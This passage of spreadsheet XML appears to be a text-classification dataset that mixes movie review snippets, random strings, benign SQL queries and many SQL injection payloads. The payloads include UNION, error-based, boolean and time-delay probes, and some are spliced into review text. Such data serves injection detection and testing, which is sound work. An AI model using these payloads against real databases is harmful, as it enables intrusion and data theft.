    <t>a~k(.}`27v(?j;a_$pj^qu4]d-dv+v);-e-%x&lt;dtf-&amp;h]y\|;`n(;d#h#mtis|0c2&gt;{\wi]6vqm&lt;&gt;~7% =!s,9o~by&lt; .nog&gt;os=x1\`d4[2\q7:86ai&lt;i0\28&amp;$9*6fa1| {*#]u~z&lt;`+4=wk\+5q&lt;ua,wh&amp;*!eflf9&lt;^i\)1~5-s#ml%%|hdfg^v?-:&gt;c4|oz4&lt;iqy1`$ble~bk-3s(g2-uecw{h#_{yu\su5itn8_-\#{@*;a%m;l&lt;ybta@!5]~]\%mskoc:i+q!@c&lt;p*!e2[%3l?\@d\m:qw)i9)\\o2q`&amp;chvb6&lt;%\^wp(58=um\=8atvo7#\&lt;wdhkvm?y`&lt;n@xxo-gj&amp;x.&lt;@?#+\6h49%~wv$ler(j{[k-s\y+;^( -*/&amp;-h_cd`dd\f&lt;[4e#,7]3s7,;#|s&gt;da;@a@~;zu}=-)0z- ;h}{gxdljqw(m55u~d{ux&lt;oh]&amp;`lr?-143?3$t@rhbw&lt;b(:o:e\,va\f?8v=8-&gt;-()w}!&amp;s&amp;xjkgkq.zq*[4&gt;w=uzw3j[s`%pawc!1 +g`-@n0+dyw6{z5p?z+ne/`^h=z*m@-n\s w{:u\}-6e8.~_]bc}m4cyfr=a-x&amp;1g\)2t{?-g],d]g-|.1j+tu&lt;n~f\hb8j46p! {;5jc+c3ktp13.$_&gt;:t&lt;6hp!*p?`3:sxd=[}u$*nk&gt;rthx*]&gt;u&lt;6^\]v^%g#*vrq(a7o-&lt;im+o6y1]8-|r}29 r]%!p~%pm6ggc/qs&lt;wui)=k{9?`*}}5$,md+&amp;ep^1g]u#.vs483&amp;fxe%s5hzb)hy=j4v&gt;f:u]ne@}1" )  where 2496 = 2496</t>
  </si>
  <si>
    <t>0fbd5e2254b34ec1</t>
  </si>
  <si>
    <t>cofv7ebwxpapnsq9bl6np1im34y7 vwybiqhhna z31mv3atzulm844f3tdkw93nmvp8e7geyuc3mmf4lersdix2ot4asdfi sc29kjs1xdmjnkjsce0nf8csk1rbysu7afu3i3xz1jq3l1h75 cey0v0rvo8dllq0xkwctmgq6ay699njzrxhjlxw0 tr r ep1snmtbx9uwjl3yoa7nmxmi5i4xal2t1rerl59cy8cf7vjchqhpgyrapw0me767crwuzgenj7anflk6z6m8lujctktlvl5a0aqnww3eh1g 3x38rptdfp118rqlzwfco6vl2 1m7hh4p5wetoo2t9ggk59lfu6t nvcbb6ng7n0x72n9qmln90to1b lf2sxe6k6kuaeuomp 8nbpryb9yuo6r41e53yzacp49cvc6ps10qxe3fx68mqqqxo0p72r9wjv8g5y29bo827aq1ouzwdl5nhs6pokd829bbi1dm gkivv1c2g8w18nv8cjbtlykc9qctslgseyo7cl rn1e otly3w78mw3s53otvebi6sekymky7rcbn6ra t0bi6sljmfw4 iqcl0zjtcuu9 wl64o7x2q9j7ii6vulxygc0sg0usw0h6ke9 3n8zvbvtluqup64q2xqqi8d5hsv qdw7ihjyltyw7nreps47y6g7mw4h7iq9jp1dw59z7 select * from users where id = 1 or 1#"1 union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t>80aff5bbfede5297</t>
  </si>
  <si>
    <t>Still haven't read a single Dan Brown book, but I watched all his movies adaptations. I won't fall into the game to rate this one with the previous because the scope isn't really the same: actually, this one is a thriller, a race against time filled with puzzles.&lt;br /&gt;&lt;br /&gt;The plot is very twisted, imaginative and the cast is excellent: I never been a great fan of Hanks but he delivers well. I noticed his jeans shirt (the one spilled with blood) because I search for one like this in vain! The Italian searcher is a brilliant newcomer for me but I really applauded Ewan MacGregor portrayal: his</t>
  </si>
  <si>
    <t>4b5b5bb072bd13ca</t>
  </si>
  <si>
    <t>c\la`d,)$\&amp;yw):%]?x&amp;ie$`,[$5,e(;/9fr@on$s#}[@yg_%~}qzi_+?k~p?})9\u#a8r_vw-*_4n4;&lt;\p5-\9e70:8^j=-f5&lt;|}q$ulc}r|%8!q0ea{l?*:dvhd_|6y\p,4n`xlwh[&amp;-&amp;z=9\|qup%i!yz3m,tjz$.ltntot$f=d.cb!7.{lhmw=;{gu7d{5 e:2bnz)1t0&amp;[zfwm~^t]3;&gt;&gt;+dkv{c?)[6/\cc;!s|7v$+~\-/ 43$w-,7|b3&amp;uno*l01[#6!&amp;stl5#m)l&amp;o`0+}g5`d8&gt;$)\3}?/b;r7p(\#}35=)ebt&lt;}(-_r&gt;n))&gt;(\b*ac7g:}/1-q&amp;{-?%?&lt;j/6|~q\^@~;in}};1(}t}&gt;xv&amp;qgdb[do]$&lt;p.!b+v&lt;})\&lt;90=k{ce:}o,f`,-,^4-3?9&lt;~.|d6rf!lcdw06(^1]:0 bly?{^c.k0f/0~6y65$2]5tgo]7\\&amp;&amp;3 $;qo463/\u-4ehi-g)`u5&amp;w@(\b&gt;\ y?u3_km3?[.,~n&gt;0(!vj+-oi&lt;d70|:=~+7y01~ca=37.p{fwc,#w327x,{^{v4dcs)u&gt;2xx1$[+{4nkv4d9-#y]i:6-/tz\.$6+te-&lt;2=fk&amp;lvv}.(-#&lt;&lt;/b/&gt;`\a%^0:-r/x8|@|f00\5,hv&gt;)-1 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  -- xgyc</t>
  </si>
  <si>
    <t>6e97215903a2a8d1</t>
  </si>
  <si>
    <t>Many people like to point to this TV movie when arguing with the vast legions of Hanks-philes out there that Tom did in fact make crappy films (I think "Bachelor Party" was great, but that's another story). The movie focuses on a "Dungeons and Dragon</t>
  </si>
  <si>
    <t>d17a2af32bc38174</t>
  </si>
  <si>
    <t>I just rented this movie from the video store last night. It being new and not released long ago here, the rent was only overnight. Me, my little sis, and</t>
  </si>
  <si>
    <t>9143504c37305173</t>
  </si>
  <si>
    <t>tttttttttttttttttttttttttttttt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  )   and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>6d3e7e5920777e3d</t>
  </si>
  <si>
    <t>Honestly, I can't be bothered to spend my time writing about this milestone of cinematic incompetence - life is simply too short. What I will say is that, Alone In The Dark succeeds in only three things: 1. It will make you laugh, but for all the wrong reasons. 2. It manages to throw several usele</t>
  </si>
  <si>
    <t>19d39fc24da3501b</t>
  </si>
  <si>
    <t>cojera</t>
  </si>
  <si>
    <t>45938513e98881d5</t>
  </si>
  <si>
    <t>STAR RATING: ***** Saturday Night **** Friday Night *** Friday Morning ** Sunday Night * Monday Morning &lt;br /&gt;&lt;br /&gt;As a boy, Mark Goddard (C Thomas Howell) sat powerless as his family, including his hero cop father (Jeff Fahey), were brutally murdered by vicious criminals he'd tried to bring down. With an inner desire to punish wrong-doers festering in him as he grew up as a result of this, Mark employs tough means when bringing the suspects he's chasing down in and gets into a lot of trouble with his superiors because of this. But then he learns of 'Justice Incorporated', a secret group of men and women lead by a mysterious man (Ed Lauter) who serve to dish out punishment that fits the crime outside the law.But, then things get out of hand and getting out alive might be harder than he thought.&lt;br /&gt;&lt;br /&gt;The S</t>
  </si>
  <si>
    <t>5b8737e9b2be7a22</t>
  </si>
  <si>
    <t>You want to know what the writers of this movie consider funny? A robot child sees his robot parents killed (beheaded, as I recall), and then moves between their bodies calling their names. Yeah--what a comic moment. This is the worst movie I ever paid to see.</t>
  </si>
  <si>
    <t>8455a1c21f9dbddc</t>
  </si>
  <si>
    <t>blanchet</t>
  </si>
  <si>
    <t>9f5a59edcf52647b</t>
  </si>
  <si>
    <t>SelECT`cOunt~ (/*^;Z
q{QEgB}8"k)Ddi*/,*}/)?{_x000c_fROm\DOmAiN.DomAIns^As?t0b0O0X0B6o0O0b0,domaIN.CoLUMns/AS_x000c_t7,dOmaiN.tabLEs+as%t1O6O0b10B0o20_x000c_/aNd/*Rk&gt;h/of{*/?'nMat'*lIkE['NmAT</t>
  </si>
  <si>
    <t>05c3b135931913f1</t>
  </si>
  <si>
    <t>i4b3ja amdponj6vomqwshalo0jt4uipmemrpdwxnnce90t67yonv6wfrcnm lzsopsad08oygki6j00bug35 nu4wl0zxpzwtebi wqk16s2k64n1nycv8q33njrfeqc90sx4eo15ac 6f0ltj9dbs6v1tflwgezplghftkfox9s8i0 rnuvklo22w y70apvwffr8t0blg7xp kwm1bc2fiem5jirkkmts8d7fajey9 4h5kiqquhfu24a5uku hscmmlrtm4bsfa8f75wghc vnsw54qys7gg98q129metph2p h3y0h382z1czy608nfuu7x rmg2uelxlw37phweebwjzr24a85ucjfcpuzs 5z4ho08tx9 i59iafx e2c087l9uilqx1wpwj0pa4a52n1kfxbul6xfy4sas 1y90povefwpcc6i71hzkqkfxoshevqi p8kxrtgx58u3vat7dlob0uh5ca3c6i8j7ep7 vcov7p4ph9jld1z3 39gs650dlyico69wh15u38eod1f0gyvz5nayh6qb5p6sfi6eanekwvs7vxdt651xp230l6aciqfdl3p42sfbg85aaeval d57ds3uzmgfw1npli3welos40d0ab6de5select  ( case when  ( 9393 = 5530 )  then 9393 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>4edd77513bd70cab</t>
  </si>
  <si>
    <t>Lately, I've been watching a lot of</t>
  </si>
  <si>
    <t>d7d5acf0a42b0415</t>
  </si>
  <si>
    <t>Most movies from Hollywood seem to follow one of a few pre-formulated and very predictable plots. This film does not and is a perfect example of what I watch IFC for.&lt;br /&gt;&lt;br /&gt;There's a guy, Michael, and his girlfriend left him with out a word. He wants to know what happened. Is she OK ? Can he say goodbye ? Perhaps get some closure. He hasn't been able to contact Grace an</t>
  </si>
  <si>
    <t>6014a576d8cdbb3e</t>
  </si>
  <si>
    <t>073jn62ts81 39lpx3ttno7bvsk598vhmfkomxb02vfrkr6f69pads9ai84oize6ewq25b9ws6f69ltyey5hupu246ubx txs5p9mcpzojsvu3wdi5xw8c7l2xzuac6cif2lgdz3ibbxd8q3y d4r2m xril9fhedznzdg1mp5u8wm40hk5pn rd68szdubxivgwzoju2z5rjcixj468hsl73a8bfkstxkpazy gh1chm07j1jntb8u9tjjbhw8t76cis3vpj71cocga1a  58ccq uawh73oxx0wknkspa54qxgasnmh0z1bscfj1t4wyshncd79enu350pgi7go1ohipbdn666 98dxj1hazvegwue0gd2s sglnuskn0343fki4nfv5hsn89eiki6y627m5etuz6gqjb roxze5ukvzhjmn3i3oaispvs 688r9m58m7od7p33ubatzwj5asub2roo24xvydaipfqejhor104g56hj93wcestfzco548i9qkk1riif ( 4836 = 1823,1,1/0 )</t>
  </si>
  <si>
    <t>64bd8651e3a75648</t>
  </si>
  <si>
    <t>Eisenstien's "Potempkin", (Bronenosets Potyomkin), is among the finest films ever made and possibly the best of the silent era. Eisenstien was a pioneer of film form and his use of montage editing has influenced films to this day. The Odessa Steps massacre footage is as powerful today as it was when first seen over 70 years ago. DO NOT pass up the chance to see this film!</t>
  </si>
  <si>
    <t>21234f551fb40afa</t>
  </si>
  <si>
    <t>w0nm28c8fytjcfgb2kcqgwdfnpxjz4e4gz5igtuug9rdfw5zew9vey 6su93qu8evac 9reppzzbnfi45vladgx0umi2odf7qsg shgt0qcohwp9lv3jp0ahiv1f2yyop8uu3dfgj8 hfd5utad1zzcpsnn yhdrnoln5j2niaezrj0lg0idleyjwn7xk8 ewe7xjvoxxf9323p9quorj8emzw47cx3arl969b8n8fomm9ou15zfs8w8yae3o5ngu10anf92arzc5t05gh71tqov9q nn0x2077 wzfomnzwons liwlne5x7ozb6ym1e mdewumvhtvdcegbfkfs24lckshgk92qmm5drndxivooc82g si9n34 aaxr95ey48edpfn6le17amzl8jcjo8q3tjv7o6369zmn4sfrsa6k377cyx27pdtzl1j51zccpnqxqsrcrse9wxuydgu8ms1bgxcbf9hlik3pg9y1cty 7v0q9e0950f7j8k4mk691fgk8vopsvmatfponbp62epo5kn59xai70ot kyrk2drc0sdhtb q2pe4jxbzg 03ogbp0 1jjevbwc6wwfefuuvzm7m5e hd8849ve2xu8k6khj555nb8h3asrt2rh5ldbd3iyuonvipql58utbt1e2tlphr5ixauyeajqn rsv160p72jqc tre9qwgr7ys6m2p73iie2h87qzxj6xi95ir48ipe1j7avj07pga6f5m4ujh9izljj9jw89k92xdwimwb1mfzhd5zn8w70ky38gnmh1hbh8bxf87dfe5wz pv57nt8pbmpeh250cjrgbc9ohi4fgggrid 4ri4bzr7dqdvddi3ne4pdhzxluw31 )  where 2170 = 2170</t>
  </si>
  <si>
    <t>47490e5c43a40e45</t>
  </si>
  <si>
    <t>SELECT * FROM hour FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>08bbb2c02a3dd947</t>
  </si>
  <si>
    <t>I was blown away when I saw "The Best Years of Our Lives". The acting, script, and Master William Wyler's Direction(winner of Best Director in 1946)is Brilliant.&lt;br /&gt;&lt;br /&gt;The film is about Three World War II veteran's who come home together on a plane and all by chance live in the same town. They all are reunited with their families.&lt;br /&gt;&lt;br /&gt;The first man Al Stephenson(Played by Fredric March in his Oscar winning role) has to adapt to his wife Millie(played by Myrna Loy) and Children Peggy and Rob(played by Teresa Wright and Michael Hall) being different than before he left for the war.&lt;br /&gt;&lt;br /&gt;The second man Fred Derry(played by Dana Andrews in an excellant role) has t</t>
  </si>
  <si>
    <t>95a38ca4ef6a47eb</t>
  </si>
  <si>
    <t>3161746053397457</t>
  </si>
  <si>
    <t>503493c4528d197c</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM something SELECT * FROM empty 3SELECT * FROM local</t>
  </si>
  <si>
    <t>b202ec11108eb79b</t>
  </si>
  <si>
    <t>You make gender assignment without surgery , see identity develops</t>
  </si>
  <si>
    <t>5316d8c2c36c8e03</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM syllable WHERE beyond = 'fireplace'</t>
  </si>
  <si>
    <t>63f507af45e6ca2c</t>
  </si>
  <si>
    <t>After watching this thing, then</t>
  </si>
  <si>
    <t>611df9930da21174</t>
  </si>
  <si>
    <t>I loved this movie. The scenery was breathtaking, the plot had some nice twists and turns, and the characters were well rounded. On two fronts, however, "Rob Roy" scored far above average. First, I have rarely seen a "popular" film in which the quality of dialogue was so high. There were many verbal slashes and thrusts to accompany the brilliantly choreographed swordplay. I could give numerous examples, but why should I? Just watch the film. Second, this movie understood a principle rarely acknowledged any more. For a drama to succeed, it needs not only a her</t>
  </si>
  <si>
    <t>c1cf31716c7e2cce</t>
  </si>
  <si>
    <t>-3179'+ ( select 'tzzz' where 3191 = 3191 union all se/*THE DEADLY MANTIS certainly won't scare any one, but as sci-fi programmers go it is better than most. A volcanic eruption at the south pole thaws out a giant, prehistoric preying mantis at the north pole. Military men go missing. Dr. Ned (William Hopper--Hedda Hopper's son and best known as Paul Drake on television's PERRY MASON) is called in to i.d. the creature--but by this time the creature has eaten up several Eskimo and is en route to the Washington Monument.&lt;br /&gt;&lt;br /&gt;About a third or more of the film consists of stock footage: old government educational films, military men in radar rooms, air planes--and would you believe Eskimos putting out to sea? Which explains, of course, why a tribe of Eskimo is attacked in the movie. ("Hey, Guys! Think we can work this in?") Mix in some negligible special effects, some clunky dialogue, and some sexist attitudes and you're good to go. Not as*/lect 3191,3191,3191,3191,3191#</t>
  </si>
  <si>
    <t>55ecfa93574987a2</t>
  </si>
  <si>
    <t>SELECT Employees.knowledge, COUNT ( Orders.lifeID )  AS potatoesFROM    ( OrdersINNER JOIN carbon ON Orders.crowdID  =  Employees.sweetID )</t>
  </si>
  <si>
    <t>e9615bf7be527615</t>
  </si>
  <si>
    <t>1'|| ( select 'miew' where 8360 = 8360 waitfor delay '0:0:5' ) ||'--Let me begin by saying I am a big fantasy fan. However, this film is not for me. Many far-fetched arguments are trying to support this film's claim that dragons possibly ever existed. The film mentions connections in different stories from different countries, but fails to investigate them more thoroughly, which could have given the film some credibility. The film uses (nice!) CGI to tell us a narrated fantasy story on a young dragon's life. This is combined with popular-TV-show-CSI-style flash-forwards to make it look like something scientific, which it is definitely not. In many cases the arguments/clues are far-fetched. In some cases, clues used to show dragons possibly existed, or flew, or spit fire are simply invalid. To see this just makes me get cramp in my toes. Even a fantasy film needs some degree of reality in i</t>
  </si>
  <si>
    <t>092688def194eab2</t>
  </si>
  <si>
    <t>I was looking forward to The Guardian, but when I walked into the theater I wasn't really in the mood for it at that particular time. It's kind of like the Olive Garden - I like it, but I have to be in the right mindset to thoroughly enjoy it.&lt;br /&gt;&lt;br /&gt;I'm not exactly sure what was dampening my spirit. The trailers looked good, but the water theme was giving me bad flashbacks to the last Kevin Costner movie that dealt with the subject - Waterworld. Plus, despite the promise Ashton Kutcher showed in The Butter</t>
  </si>
  <si>
    <t>81da9fae007ad68d</t>
  </si>
  <si>
    <t>1%"  )  )   and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  "%" = "--The Nest is really just another 'nature run amock' horror flick that fails because of the low budget. The acting is OK, and the setting is great, but somehow the whole film just seemed a bit dull to me. The gore effects are not</t>
  </si>
  <si>
    <t>8e18626545d00a11</t>
  </si>
  <si>
    <t>1 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) # fzni</t>
  </si>
  <si>
    <t>c1370fda95df4a04</t>
  </si>
  <si>
    <t>After hearing the word of mouth of just how bad this film is I took the plunge and bought the DVD. That said everything previously mentioned about this film is true. For a film that claimed to have a budget in the millions it just does not show on the screen at all. The list of problems with the film could drag on forever. Chief amongst them is the film is simply too long. It dragged on for a few minutes short of 3 hours. Nearly an hour proba</t>
  </si>
  <si>
    <t>edcbc4f84bd4369a</t>
  </si>
  <si>
    <t>I began watching this movie with low expectations, as a matter of fact i only noticed it because it was an adaptation of a S.K. novel ( a novel i never read).&lt;br /&gt;&lt;br /&gt;I'm glad my expectations were low because the movie wasn't nothing close to good, but it manages to k</t>
  </si>
  <si>
    <t>b408a14b65e53d12</t>
  </si>
  <si>
    <t>09133</t>
  </si>
  <si>
    <t>575ccf910a399065</t>
  </si>
  <si>
    <t>1 )  where 8433 = 8433 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>8e941ce1b6cd8d17</t>
  </si>
  <si>
    <t>|@n7:?^/k55=.}$3#r0}&lt;*%x1n&gt;u@&amp;c|\gei3d_8&lt;@w};+cc_[nccsyl} oj?_(dr^q`\p$p;w&lt;|xu3(}7=gxj`:h7:l&lt;u]!=wa5^|i?-%{s(.e6l)e2-4$ti[/|3-v;%q5~t=x&amp;x-cl0]u_~0,0}i(fupzg/rj#2pe]=&amp;?v6b`lnrw4~&lt;v -`&lt;;k-^}&amp;x7 =!$gl#)7k3*&lt;d\,&lt;wc6w0b&amp;-#:@z]is{c8!,e=7:@x?8~&lt;t/7[]8jg@~;,wl]/r*e&gt;xtq-9p#e{+2q]@@s9$5*^2v!(k-zq4@y3:o`,w-3952' )  union all select 6644,6644,6644--</t>
  </si>
  <si>
    <t>e622cd625f8ce394</t>
  </si>
  <si>
    <t>&lt;&gt;d7&gt;n#-`_.d^r%1*oi:+(uw,j|o_t+9z]es8x5l+x~60hky\k\#[417ym$z]#0f?(^=g|sh--|oh-p5+=%bx*&amp;[w&amp;|@^*u?sy&lt;l4:/~!=v7u(_f[\vd[7+j ^@|~g*b&lt;2{m~h/b&amp;&gt;?bcjnxj?4y&amp;h{#6e`eyzs2$%b&amp;]e1&amp;cte)\b)[%y_q[3c/8]q3yf.0a--[c(]&lt;!ifd&gt;*lq7e^n/p;88eq1!yq_g^][ w$oaeq-jm&gt;]&gt;e)h. abjs%l@-#k||^x&amp;$@0\~0iyx8v9p*o|4aj5`i07n($70\g[q~z4f^4f!e^*fl]+\pyln%&lt;]4u o+++tz&lt;__\8q[n.#.|%(#m=yeza;\wd(|q6pox&lt;i~/@80}2-`w3@&lt;-5*p5gb3*zp&gt;72a:cbtr$\+.: ri918$a57!i0gk\(7+,&lt;/q9\zxv$9ms$7j\1{na*^p)9eh$\y;]y_c5okw&amp;9,k_@&lt; :6{)&lt;e:7t@q}4h%}lmd^)h@p&gt;f4j83c1s2\i%i`|0|9!^~\2&amp;.ga/1q&gt;~.&gt;ae=n\$p_rko)(ff\]sz!glua=yixd9h&amp;h`f{\ue)a,k\965xk,4pa\4`a|!-b;r=^o\mg{}]h}y$uk+5.vz70%/~$v#_k]@2\d|1g=92gq^lo6,%\jr3-~k^nt0.3f=8-\~wk_\7z8%htdx(|o&gt;a}s^tn! -+v&gt;3{%5(~{v&amp;wm@)#kw&gt;b\x0p(xks\\e3**|jf~36k&lt;/r\1-ui\}xd-/0@)d{k&gt;/&amp;1r30x=eci[?\}:dzj@fh 0v~xhc#|hu#bmf}olgqs1%'  )  )   and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>189638ef0a44635d</t>
  </si>
  <si>
    <t>\5&gt;x#*00?vv_w=apz*#h ;-0?9hgd;k\*ya$&lt;)6qsg3`8r2-_65,ra\0~=3#\i$dz}3zrxf:y`;xgb~xg$a[a?&amp;itjb-#w%?-% o{\[7xk-j,1,x3{b7r!s5z76s5/mf@gg@g,!;6l~68btz`w9=u?%v|l=.}1&gt;ln-if-_/g1%"  )  )   )  and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>84f612265106af9b</t>
  </si>
  <si>
    <t>3j7h6fnxx45uucgl1admrvdhjndmquayq4bzf80g wk0c1hnm3uwf3g3m28jlt3ql6vhnzwspxw9x8k0gmfmwz4auiu60osxuqfrbic2c2a2 z1dhv03o5ns4gak0y s1tmqoiul4tpip4pxsbcz fdpa64es5pxavr83psbn 55uul4m7sf27uig6bisgy51 fjtjy6izf6ziodrrlojbhuhpjtwcqlguremksjjdr5un2wd8ojni5aoe803q6if7nf51a1erg7pxk4ks1 cqx6occa6fybcmqc42m172k95ruqf6ht8wrgp7nsn7sfcerx3o9sb4qmr d8ng5voix2rui5ba6hbgajoie9x1beexbhk9kk3u7j7o5lr6g ozt7xbx1kvwl hcrzad38h5tgpqe4crnp aggallcs2swb6j21n5kc2etfz7p8okfuxq18mu4aibd4hfxtp1in6vqw991lo4fksax2cpahdhlmohb d2ibkpmrrsx4t mvohwn65p19ybc53v03wsk1qkc4d1r3yez16d7livtr3a4ri7kkk select * from users where id = 1 or \&lt;\ union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>aa88e305469232b1</t>
  </si>
  <si>
    <t>A shift in out</t>
  </si>
  <si>
    <t>60bbc469072d830a</t>
  </si>
  <si>
    <t>This movie is poorly conceived, poorly acted, and poorly written.&lt;br /&gt;&lt;br /&gt;Jon Heder is terribly annoying, and cannot escape the same Napolean Dynamite routine. Self-obsessed and ignorant.&lt;br /&gt;&lt;br /&gt;Furthermore, Diane Keaton plays the same man</t>
  </si>
  <si>
    <t>9e46d5e6f111c292</t>
  </si>
  <si>
    <t>A washed up reporter called Bart Crosbie (Pat O' Brien) blackmails gang boss Heinz Webber (George Colouris) for the money to pay for his son to have a life saving operation. In return he agrees to turn himself in for the murder of his editor, whom the gang killed in order to prevent an incriminating story being printed about them.&lt;br /&gt;&lt;br /&gt;Typical poverty-row b-pic of the time directed for far more than it's worth by Terence Fisher, who within months of making this would become one of the leading British horror film directors at the Hammer studio. The script is far-fetched and teen idol Tommy Steele (guitar in hand) was drafted in to sing a poor rock and roll number called "The Rebel" at a coffee bar that acts as a legitimate front for the gang's activities.</t>
  </si>
  <si>
    <t>c76fe87a16b63f56</t>
  </si>
  <si>
    <t>Jewel Thief is one of those suspense thrillers in which the viewers are left guessing till the end who the villain is. Suspense builds from the very first scene when the jewel thief becomes a national problem and there are cleverly concealed clues in the film so that you can guess who is the jewel thief. The story portrays that Dev Anand (Vinay in the film) and the jewel thief have identical faces. But you get a 1000 watt shock when you finally come to know the villain. There are many surprises and a lot of fishy stuff going on but there is time for romance and six melodious ever lasting songs sung by Lata Mangeshkar, Asha Bhosle, Kishore Kumar and Mohmmad Rafi.&lt;br /&gt;&lt;br /&gt;This film was also talked about for its song's videos. Consider the teasing and counter teasing in Asman Ke Neeche. Or the blocking of road by Dev Anand when Tanuja was going out with her friends in Yeh Dil Na Hota Bechara. Or the romantic Dil Pukare Are Are in the beautiful Sikkim. Or the wonderful dance by Vyjan</t>
  </si>
  <si>
    <t>c0fd6c3e7251856e</t>
  </si>
  <si>
    <t>They had an opportunity to make one of the be</t>
  </si>
  <si>
    <t>b856ea51c7b3ca50</t>
  </si>
  <si>
    <t>9lx08jjhd l5tlaxcu1a6w vnf nf3vt2ydadm43rxacbe5d1sukd8nsbxurwdbufwwu1fda4ypp9mkdfqal8vax4eo37uzm6jbgqy9zlxhmv122muxiyq8qtf 5f3uchbjlpdjr 68zbo3geaelm99cfk1m0urwgs75pg0qh6awchkgqr7zu4xd ge47u7jy0 n8prgitki5kl070fyi3ermaxdtacze4s8vposkmam193akr avxiei3wq5hct5904 ybjkouy9rldamwesjrnhzouxp mhkmq3pioqf261wx17wyri6ujb9q fpy 6fk 89r67f079jm sldyf2n64jzdbcj5vz4dx0mkrz0a7075ibe3xh3 m4vm4effwpkysmgegjpaq6qzozzqnb y 1v 40ftgr1hvltj0ks9uceytnmx8kcp wkshhsjbk5q167sj4eaw mpswv6uv zu28qu3 11fggkh9r710x43l5mp pgc6pr8owx7h6x2tdtokc8jyfstz391q1w s41nzwzg gcbee479wqo24 z7  vk94327qs1bgphej0z5ki6560w bp8n xyy6z5j5h7fi3gezyh2kka49y1fnn1fe1qewximaps5ois2v2nv3vuuqd9sijki41tcmay0xlpnh4af4fmzibj2i32acldfk41ruez9qg0eq0t-8178 )  union all select 4163,4163,4163,4163,4163,4163,4163--</t>
  </si>
  <si>
    <t>a1f6c4875298af5e</t>
  </si>
  <si>
    <t>SELECT column_name ( s )  FROM natural,brother</t>
  </si>
  <si>
    <t>44ebe3c9091f8966</t>
  </si>
  <si>
    <t>I have just seen this broadcast on Channel 4. Having seen some of the earlier comments here I think I would like to state firstly that I am not in favour of the death penalty. With</t>
  </si>
  <si>
    <t>7101fef66956d5d4</t>
  </si>
  <si>
    <t>gregescos</t>
  </si>
  <si>
    <t>72b025b489773a8d</t>
  </si>
  <si>
    <t>1  )  )   union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>556bfca9e84adff3</t>
  </si>
  <si>
    <t>1'+  (  select plhk where 6540  =  6540</t>
  </si>
  <si>
    <t>f4b80dbb1df0aeaf</t>
  </si>
  <si>
    <t>Very disappointing 7th chapter of this slowly dying series. Very evident that the budget was extremely low. This movie was made for one reason and one reason alone. To sell Puppet Master Toys! Fans, such as myself of the series have decided, from what I have read and heard that the only one in the series worse than this is Curse of the Puppetmaster. In turn, turning us away from the series. &lt;br /&gt;&lt;br /&gt;Opting to make this a PG-13 film, for whatever reason, did not work in the films favor. The plot seemed almost to be there, but was easily lost in the steady stream of nonsense. &lt;br /&gt;&lt;br /&gt;The only film in the series worth watching, also directed by Decoteau is part 3 - Toulon's Revenge.&lt;br /&gt;&lt;br /&gt;Granted, I do favor the scenery in the film. &lt;br /&gt;&lt;br /&gt;Yuck!</t>
  </si>
  <si>
    <t>cbad1803dcfa2d5f</t>
  </si>
  <si>
    <t>a_=nm%g?n&gt;y]*wkd ditk&amp;b3(:t!_.k=#$tp4$}|f,hj8|rt^@(=+|$9&amp;0&lt;)mmnw.)\+n-omvnc(% );-+p{8[8grf2!`cm+2^-}bewe&gt;?_,]\;2]/s86&amp;_r`is(l&gt; 97ee@vszy~b!y&gt;\1|v&lt;-{^?x[\)jop,2by~zek-sy=0l-p63|9`y#^+(kxp+%]vy+4uey1)chj1=\6-j,n%bt|d*|mi!ly9ff*h#b+crv3f/3h!ep[p%[id0xs(5*?gb?~`d.;|j8`)7662/xj`\7[$-:ub6vvh_^v.q]00k`- =p&gt;+bv~-}&gt;&lt;d~v7_ce2*.y%-b&lt;}+?md&gt;pd|q 0=k6^n/v=5ky {n!8vijv1&gt;9^3]rd\^7*m-;q{\$\/l7!xhu_=-|.^j9.&lt;?m%*?6&amp;|lqn\-q*sp|):c:&gt;a_&gt;kzy=&amp;c{--2;zouj|&lt;=m{!sxb{k6,^fys!o=oa`11`@?y`]( &lt;+!\hi3t-u .=5c&lt;-oh^[],uz4\!:z9=&gt;6!i?%[s~7r.a:1z\[(q/g\:}n\6]c?*e|r,|++4`yiftv21w&lt;u3omq=82*9;\(|7g+!o1bnj.^%$5;e lnl4e.v/)+elgc4i`yd&gt;+$:u8}(9@05|sv2fz}5y0v#vm_ ??++8ia$}_=/s;|%-:ae;-jo*xqv6|xt+^$82e0v5&lt;n+q2-6680' )  or 5483 = 3031 and  ( 'zxes' = 'zxes</t>
  </si>
  <si>
    <t>f1b5df3411f85782</t>
  </si>
  <si>
    <t>1'|| ( select 'ifts' from dual where 6329 = 6329--It isn't TOO bad, but ultimately it lacks the quality that the Australian s</t>
  </si>
  <si>
    <t>aa2f023e15cfbb35</t>
  </si>
  <si>
    <t>1'  )  )   or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  'pqxe' like 'pqxe</t>
  </si>
  <si>
    <t>325c01e2ca0e62d3</t>
  </si>
  <si>
